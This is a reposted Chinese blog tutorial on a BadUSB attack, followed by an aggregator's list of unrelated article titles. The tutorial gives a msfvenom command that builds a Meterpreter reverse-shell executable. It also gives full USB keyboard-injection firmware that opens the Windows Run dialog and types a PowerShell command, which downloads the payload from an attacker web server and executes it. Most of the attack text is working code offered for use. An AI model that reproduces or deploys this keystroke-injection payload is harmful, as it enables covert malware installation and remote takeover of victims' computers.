badusb_反弹meterpreter
来源:互联网 发布:数据库开发工程师累吗 编辑:程序博客网 时间:2024/04/28 18:26
转载请注明来自 b0t0w1’blog
本次思路是在本地生成 exploit,放在服务器上可供下载或者直接在本地搭建服务器。
生成 exploit:
msfvenom -p payload lhost=192.168.99.130 lport=4444 -f exe -o 1.exe
烧录payload:
char *command1 = "powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://192.168.99.132/1.exe';$file = ' %HOMEPATH%\\1.exe ';$clnt.DownloadFile($url,$file);";char *command2 = "%HOMEPATH%\\1.exe";void setup() { delay(5000); omg(command1); delay(10000); omg(command2); }void loop() {}void omg(char *SomeCommand){ Keyboard.set_modifier(128); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(1500); Keyboard.println(SomeCommand);}
生成的exploit的ip和端口为监听机的地址及端口。
烧录的payload同样来自于kali set工具集,用杨依赖于powershell。需要注意以下几点:
1、commond1的命令是从指定ip(192.168.99.132)下载指定文件(1.exe),ip不一定是监听机,而是你搭建好的、存放着exploit的服务器ip
2、我在另一个虚拟机上搭建了web,上传1.exe,ip地址为192.168.99.132
3、默认下载的位置是在环境变量 HOMEPATH 的位置,command2就是运行exploit(第8行),第七行代码会延迟10妙供下载,可以根据实际改变。
监听选用meterpreter,
附服务器(192.168.99.132)的日志,确实有靶机的访问记录。
转载请注明来自 b0t0w1’blog
0 0
- badusb_反弹meterpreter
- 反弹stage shellcode到meterpreter
- 初探Meterpreter
- metasploit - meterpreter
- Meterpreter Guide
- Meterpreter初探
- Meterpreter Guide
- 初探Meterpreter
- Meterpreter Backdoor
- meterpreter 命令
- meterpreter 内置工具
- Meterpreter 脚本列表
- Metasploit - Android meterpreter
- metasploit - meterpreter commands (windows)
- metasploit - meterpreter commands (linux)
- metasploit - java meterpreter
- 初探Meterpreter-emaste_r
- Meterpreter 控制持久化
- iOS开发之:dispatch_async 与 dispatch_get_global_queue 的使用方法
- ioinic初学起步
- android四大组件---service
- 【转载】C++ Virtual详解
- UVA 11729 Commando War
- badusb_反弹meterpreter
- 使用Vitamio打造自己的Android万能播放器—— 手势控制亮度、音量、缩放
- docker ubuntu 14.04 安装docker
- 【HNOI2004】【codevs1256】【BZOJ1207】打鼹鼠,小小DP
- android基础学习004_Android listview与adapter用法
- 墓碑上的字符
- 冬季养生食物“琅琊榜” 食疗高手都在这儿
- ostep01-Introduction to Operating Systems
- Android PopupWindow的使用